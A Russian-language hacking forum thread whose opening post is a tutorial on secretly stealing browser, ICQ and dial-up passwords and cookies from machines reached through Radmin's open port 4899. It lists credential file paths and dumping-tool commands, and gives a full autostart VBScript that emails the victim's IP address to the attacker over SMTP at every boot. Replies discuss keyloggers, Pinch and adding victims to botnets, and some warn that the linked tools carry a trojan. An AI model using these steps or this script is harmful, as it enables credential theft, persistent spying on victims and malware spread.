Cейчас я покажу как стырить пароли от Opera , IE , Mozilla , ICQ и пароли от инета .
Через 4899 порт . Как всегда сканим диапазон на открытый порт . Нам нужно передать файлы и воспользоватся telnet'ом .
Cookies от IE находятся в C:\Documents and Settings\[Имя_Юзера]\Cookies - копируем всё на комп . Здесь все кукисы берем те которые нам нужны .
Их много берём что то типо user@mail[1].txt здесь будут куки от mail.ru . Ну здесь куки от всех сайтов .
Пароль от Icq в C:\Documents and Settings\[Имя_Юзера]\Application Data\ICQ\[uin_юзера]\Owner.mdb .
Пароли от Opera'ы в C:\Documents and Settings\[Имя_Юзера]\Application Data\Opera\Opera\profile\wand.dat
Теперь стырим Cookies от Mozill'ы вспомошью проги Mozilla Cookies View . Кидаем прогу на диск "С". И пишем в Telnet .
cd\
mzcv.exe /stext pass_mozilla.txt - (mzcv название проги вкратце) ну и всё на диске появится pass_mozilla.txt там будут куки от Мозилы. напишем ламреру сообщение .
И пасы от инета стырим прогой Dialupass , также кидаем на диск "С" и пишем в Telnet.
cd\
x.exe /stext pass_inet.txt
Теперь надо всё расшифровать . Для этого нужны проги Unwand -(расшифровывает пароли в Oper'е) и ICQ6 hash recover -(расшифровывает пароль от icq6)
Куки могут неподойти так как они долго нежевут , а расшифровать пас от ICQ легко .
Указываем путь к Owner.mdb bи получаем md5 хеш , расшифровываем его и всё .
Теперь покажу для текех у кого ip динамический , как сделать чтобы ip приходил при включении компа . Просто помешаем mail.vbs в автозагрузку и всё .
Ну вот и всё каждый раз при включении ипы будет приходить на мыло .
Тело mail.vbs :
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c ipconfig > C:\WINDOWS\ip.txt", 0, false

WScript.Sleep (5000)

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost("smtp.mail.ru","куда_придёт ипы@mail.ru","левое мыло@mail.ru","IP ЛАМЕРА","hacked by hack-win32")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,s trBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="логин левого мыла без"@mail.ru""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="пас левого мыла"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
iMsg.AddAttachment "C:\WINDOWS\ip.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing

ICQ6 hash recover
Unwand
Скачать (http://multi-up.com/170220)

Видео к статье --> Скачать (http://multi-up.com/170224)

(с)hack-win32 другой ник hack001

Не у всех винда ;)
Но старался, это видно

Старался-то старался...
Но вот всё палевно и неактуально.
Пригодилось бы несколько лет назад, ещё до создания пинча.

Старался-то старался...
Но вот всё палевно и неактуально.
Пригодилось бы несколько лет назад, ещё до создания пинча.
вот чё здесь палевно ? вся работа через telnet и передачу файлов .

вот чё здесь палевно ? вся работа через telnet и передачу файлов .

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.
Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)

Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)

Конечно, я его и не осуждаю, это хорошо, может он в итоге трой хороший напишет.

Ещё круто када 25 порт закрыт,пароли хер прийдут!

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.
можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален

Ещё круто када 25 порт закрыт,пароли хер прийдут!
а разве порт сменить нельзя?))

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.
я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)

можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален


а разве порт сменить нельзя?))


я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)
Вобщето smtp на мэйле работает по 25 порту, и по 2525 кажется.....Если они закрыты *** получится
и потом если метасплойтом получить доступ к командной строке то нахуя гародить какие-то скрипты, когда можо напрямую к файлам добраться?

знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)

и потом если метасплойтом получить доступ к командной строке то нахуя гародить какие-то скрипты, когда можо напрямую к файлам добраться?
и радмином можно получить доступ;)
ТС делает же все через радмин;)

знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)

и радмином можно получить доступ;)
ТС делает же все через радмин;)
чет я про радмин не заметил,я тока код глянул...
Ну тогда ваще непонимаю зачем скрипт было писать...

знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)

и радмином можно получить доступ;)
ТС делает же все через радмин;)


Дан, ты не в теме, он через telnet делает.

чет я про радмин не заметил,я тока код глянул...
Ну тогда ваще непонимаю зачем скрипт было писать...
какие скрипты ? там только один скрипт для оправки ипы на мыло при включении компа

Дан, ты не в теме, он через telnet делает.
читай название темы:Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]
Данный порт использует программа Radmin и там встроенный telnet и передача файлов:)

какие скрипты ? там только один скрипт для оправки ипы на мыло при включении компа
он самый

в прогах трой! =\

Neshta, переделывает ехешник что незя прогу запустить какую либо.

в прогах трой! =\

Neshta, переделывает ехешник что незя прогу запустить какую либо.

норм тока 1 прога, которая расшифровывает пассы от оперы, а прога для аськи трой

угу, а я открыл его + антивир отрубил =\\ повезло фаервол закричал, все исправил.

тс,извини а статейка то раньше вроде на другом ресурсе появилась тут (http://webxakep.net/forum/showthread.php?t=5029&highlight=%5B%F7%E5%F0%E5%E7+4899+%EF%EE%F0%F2%5D)

какае-то лажа а не статья =\

какае-то лажа а не статья =\
если у тебя что-то неполучается это незначить что статья лажа

во первых что тут может не получаться? во вторых это не статья а полное гумно, не понимаю почему ее не удалят.
здесь нет ничего стоящего, вообще ничего нет.

Пусть будет, вдруг пригодится

кал!
То что описано здесь, в реальной жизни не пригодится никогда.
Слишком много условий которые должны исполнится.

Почитал - таким образом добыть пароли ты сможешь у 0,00001% людей.
Это тоже самое что ограбить банк при условии, что сигнализация нерабочая, пьяные охранники спят и кто-то случайно забыл закрыть сейф.

Почитал - таким образом добыть пароли ты сможешь у 0,00001% людей.
Это тоже самое что ограбить банк при условии, что сигнализация нерабочая, пьяные охранники спят и кто-то случайно забыл закрыть сейф.
Почему же,процент добычи паролей при установленной радмине достаточно велик..
Например вы нашли бажную тачку и ломанули через определенный эксплоит,хотим достать пароль например ака от вконтакта,жертва использует Opera,и способом
ТС можно достать ак

Если имеется доступ (с паролем по дефолту 12345678) через радмин то зачем все это ? закидаещ через файл менеджер пинча или кейлоггер и запускаеш через telnet радмина и все ....

P/S B мне кажется что таких компов с открытым портом и паролем по дефолту даволно много но что с таких юзеров можно иметь кривую 9ти знак ?

P/S Лучше у жертвы поднять соксбот или добавит в ddosботнет ...

Если имеется доступ (с паролем по дефолту 12345678) через радмин то зачем все это ? закидаещ через файл менеджер пинча или кейлоггер и запускаеш через telnet радмина и все ....

P/S B мне кажется что таких компов с открытым портом и паролем по дефолту даволно много но что с таких юзеров можно иметь кривую 9ти знак ?

P/S Лучше у жертвы поднять соксбот или добавит в ddosботнет ...
ну как я сказал,что получим доступ через опред.эксплоит)
Там могут быть много чего,и зачем ломать дедики и добавлять туда ехе,там заебешься ботнет собирать)
Пинч не ворует пасы от последних версий фф,ие и оперы

А не проше когда стырил прогой MPR все узнать ?
Проще только пинч :D

по ссылке на openfile в папке icq - вирус НЭШТА!! - такая поебень заражает все экзешники, хуже этого вируса я еще не сталкивался